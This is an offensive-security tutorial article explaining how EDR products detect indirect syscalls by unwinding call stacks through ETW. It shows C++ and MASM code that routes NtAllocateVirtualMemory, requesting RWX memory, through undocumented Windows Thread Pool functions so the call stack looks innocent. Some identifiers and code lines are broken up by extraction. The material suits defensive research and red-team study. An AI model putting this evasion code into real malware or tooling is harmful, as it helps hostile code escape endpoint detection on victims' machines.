warning
This article is intended for security specialists operating under a contract; all information provided in it is for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication. Distribution of malware, disruption of systems, and violation of secrecy of correspondence are prosecuted by law.
WinAPI indirect calls
Why invent something new if such a technique as WinAPI Indirect Calls already exists? It has certain advantages, and it’s easy to implement and well-documented. Let me briefly remind you of its operating principle.
The essence of the Indirect Syscalls technique is that NTAPI is called not directly via ntdll.
, but using special code that emulates a NTAPI function call: a stack of arguments is formed; the number of the system service used for this call is saved to eax
; and then a jump to the address of the syscall
instruction in ntdll.
is performed. The code looks something like this:
// The argument stack has already been formed; the WinAPI call from ntdll.dll is performed next
mov r10, rcx
mov eax, <syscall_number>
jmp <address_of_syscall_instruction_in_ntdll>
From the outside, it looks fine, and it had worked until EDR started using Event Tracing for Windows (ETW) to unwind the system call stack. Too bad, even though the Indirect Syscalls technique makes it possible to avoid detection at the user mode level, it still leaves traces in the call stack. EDR can now unwind this stack, analyze it, and detect such anomalies.
Stack, frames, and EDR
To proceed further, a basic understanding of stack frames is required: how are they generated and how do they work. A stack frame is a memory area in the stack allocated for the execution of each function contained in the program. It contains such data as function parameters, local variables, register values, and return address. Below is a simple example of such code:
void func1() { int x = 10; func2(x); ... ...}void func2(int y) { int z = y + 5;}
When func2(
is called, the following frame is generated:
-
RSP
is thez
variable; -
RBP
is the base pointer of the previous frame; -
RBP
is the pointer to the next instruction in+ 8 func1(
(return address); and) -
RBP
is a parameter of the+ 16 func2
function.
In other words, stack frames are generated every time a function is called, and they contain plenty of useful information, including a pointer to the previous frame (you can consider it a function). This is how EDR reverses the control flow if it detects suspicious behavior in the system. Needless to say that commonly used obfuscation methods for WinAPI calls won’t protect you from this detection technique; so, let’s try to forge a special frame to fool EDR.
info
Event Tracing for Windows (ETW) is a technology embedded in Windows OS; it collects and records event-related data from various system components and applications. ETW provides powerful telemetry tools, including collection of information about the call stack, which is essential for diagnostics, performance monitoring, and security analysis.
How EDR monitors the stack
The thing is that EDR knows how the stack should look in any given situation, and if its structure deviates from the norm, an alert is triggered. Among other things, EDR checks:
- where the jump to
syscall
was made from. If the jump was made from a memory region that doesn’t belong tontdll.
(e.g. the heap or allocated memory), this is considered an anomaly;dll - access rights to the memory region from where the jump was made. If the region has
PAGE_EXECUTE_READWRITE
rights, this might indicate an indirect call or shellcode; and - where the execution flow will return after the system call is completed. If the returned address points to user memory, this is also considered an anomaly.
Now let’s see how the correct (from the EDR point of view) call stack structure looks when memory is allocated from a user application:
0x00007ffb`12345678 ntdll!NtAllocateVirtualMemory
0x00007ffb`12345555 kernel32!VirtualAlloc
0x00007ffb`12345432 MyProgram!Main
The MyProgram
application allocates memory from the main
function using VirtualAlloc
that calls the NtAllocateVirtualMemory
NTAPI from ntdll.
. But what happens if a NTAPI is called manually (i.e. you form a stack and registers for the call)? In such a situation, the program makes an indirect call:
mov r10, rcx
// Number of NtAllocateVirtualMemory in the service table
mov eax, 0x18
// Making a syscall at a certain address in ntdll.dll
jmp 0x00007ffb`12345678
EDR captures the call stack:
0x00007ffb`12345678 ntdll!NtAllocateVirtualMemory
// Address in user memory (where you’ve generated arguments) from where the jump to the system call was performed inside ntdll.dll
0x000001a3`45678901 [RX Region]
0x00007ffb`12345432 MyProgram!Main
You can see that the return address points to ntdll.
, but the stack begins in user memory, which triggers an alert!
It turns out that indirect calls are not as difficult to detect as it might seem. Well, let’s find a solution!
Calling NTAPI without traces
One of my previous articles describes a code injection technique called PoolParty that uses the Windows Thread Pools mechanism. Now I am going to show how to call a NTAPI using the same mechanism. It must be noted that this isn’t the only Windows mechanism that can be used to proxy NTAPI calls, but just a more or less researched one.
The TpAllocWork
, TpPostWork
, and TpReleaseWork
functions are of special interest in this regard: they are used to manage tasks in Windows Thread Pools. These functions make it possible to create, start, and release tasks that are processed by the Windows Thread Pools, which facilitates parallel code execution. Needless to say that they are absolutely undocumented and contained in ntdll.
. Let’s use them to call a NTAPI bypassing stack monitoring. But first, let’s examine their prototypes.
The TpAllocWork
function creates a new task that can be executed by the thread pool. When you create a task, you have to specify a callback function that will be executed when the thread pool starts processing this task.
PTP_WORK TpAllocWork( PTP_WORK_CALLBACK WorkCallback, PVOID Context, PTP_CALLBACK_ENVIRON CallbackEnviron);
Parameters:
-
WorkCallback
is a pointer to the callback function that will be called to execute the task; -
Context
is a pointer to the user context that is passed to the callback function; and -
CallbackEnviron
is a pointer to theTP_CALLBACK_ENVIRON
structure that configures environment for the task. If the value of this parameter isnullptr
, the default environment is used.
After execution, TpAllocWork
returns a pointer to PTP_WORK
(work object of the thread pool) in the case of success or nullptr
in case of an error.
The next function is TpPostWork
: it posts the created task to the thread pool queue for execution. This function activates the execution of the task created by TpAllocWork
.
void TpPostWork( PTP_WORK Work);
The only parameter of PTP_WORK
is a pointer to the work object of the thread pool that was created using TpAllocWork
.
The last function is TpReleaseWork
: it releases the task object. This function is required to release resources allocated to the task created using TpAllocWork
. If the task is queued or running, the TpReleaseWork
call will wait until the task is completed and then release the resources.
void TpReleaseWork( PTP_WORK Work);
Similar to the previous function, TpReleaseWork
has only one argument: PTP_WORK
.
An API call performed using these functions is formed as follows:
typedef NTSTATUS(NTAPI* ALLOCWORK)(PTP_WORK* ptpWork, PTP_WORK_CALLBACK ptpCallback, PVOID arg, PTP_CALLBACK_ENVIRON CallbackEnv);typedef VOID(NTAPI* POSTWORK)(PTP_WORK);typedef VOID(NTAPI* RELEASEWORK)(PTP_WORK);...VOID MakeCall(PTP_WORK_CALLBACK work_callback, PVOID args) { PTP_WORK ptpWork = NULL; ((TPALLOCWORK)ptr_TpAllocWork)(&ptpWork, (PTP_WORK_CALLBACK)work_callback, args, NULL); ((TPPOSTWORK)ptr_TpPostWork)(ptpWork); ((TPRELEASEWORK)ptr_TpReleaseWork)(ptpWork); WaitForSingleObject((HANDLE)-1, 0x1000);}
PTP_WORK_CALLBACK
is a pointer to an assembly language insertion that will make the NTAPI call; while PVOID
is the argument pack of the called function.
The argument pack is formed as a regular structure containing function parameters. The only exception is that the first argument in this structure is a pointer to NtAllocateVirtualMemory
. In this particular case, it looks as follows:
// Argument structuretypedef struct _ZWALLOCATEVIRTUALMEMORY_ARG { // The first argument in the structure is a pointer to the NtAllocateVirtualMemory function. UINT_PTR pNtAllocateVirtualMemory; HANDLE ProcessHandle; PVOID* BaseAddress; ULONG_PTR ZeroBits; PSIZE_T RegionSize; ULONG AllocationType; ULONG Protect;} ZWALLOCATEVIRTUALMEMORY_ARG, * PZWALLOCATEVIRTUALMEMORY_ARG;...PVOID NtAllocateVirtualMemory(HANDLE hProcess) { PVOID alloc_addr = NULL; SIZE_T alloc_size = 0x1000; ZWALLOCATEVIRTUALMEMORY_ARG AllocateVirtualMemory_Arg = { 0 }; // Here you get a pointer to NtAllocateVirtualMemory AllocateVirtualMemory_Arg.pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddress(GetModuleHandleA("ntdll"), "NtAllocateVirtualMemory"); AllocateVirtualMemory_Arg.ProcessHandle = hProcess; AllocateVirtualMemory_Arg.BaseAddress = &alloc_addr; AllocateVirtualMemory_Arg.ZeroBits = 0; AllocateVirtualMemory_Arg.RegionSize = &alloc_size; AllocateVirtualMemory_Arg.AllocationType = MEM_RESERVE; AllocateVirtualMemory_Arg.Protect = PAGE_EXECUTE_READWRITE; MakeCall((PTP_WORK_CALLBACK)NtAllocateVirtualMemoryCallback, &AllocateVirtualMemory_Arg); return alloc_addr;}
work_callback
is written in MASM, and its purpose is to parse the arguments, form a stack for NtAllocateVirtualMemory
, and call the function. In x64, arguments are passed to the function as follows: the first four arguments are passed via the rcx
, rdx
, r8
, and r9
registers; if the number of arguments is greater, the subsequent arguments are passed via the stack using the rsp
register.
NtAllocateVirtualMemoryCallback proc mov rbx, rdx ; Get NTAPI address from the structure mov rax, [rbx] ; Receive all its remaining arguments mov rcx, [rbx + 8] mov rdx, [rbx + 10h] xor r8, r8 mov r9, [rbx + 18h] mov r10, [rbx + 20h] mov [rsp + 30h], r10 mov r10, 1000h mov [rsp + 28h], r10 ; Call NtAllocateVirtualMemoryNtAllocateVirtualMemoryCallback endp jmp rax
Note that an assembler function can be called from C++ code by declaring it with extern
in one of the headers.
extern "C" VOID CALLBACK NtAllocateVirtualMemoryCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work);
After that, you can call NtAllocateVirtualMemory(
, and the stack will look absolutely ‘innocent’ because the function call will be performed by the Windows Thread Pools mechanism.

Conclusions
Congrats! Now you know what is stack unwinding, how it helps to detect the execution of malicious code, and how this detection mechanism can be fooled. Importantly, Windows itself helps you to avoid detection. Can this technique be considered a silver bullet? Of course, not! As soon as EDR systems start monitoring callbacks in functions that are of interest to them, this secret will be exposed. But, as always, the battle between the shield and the sword continues!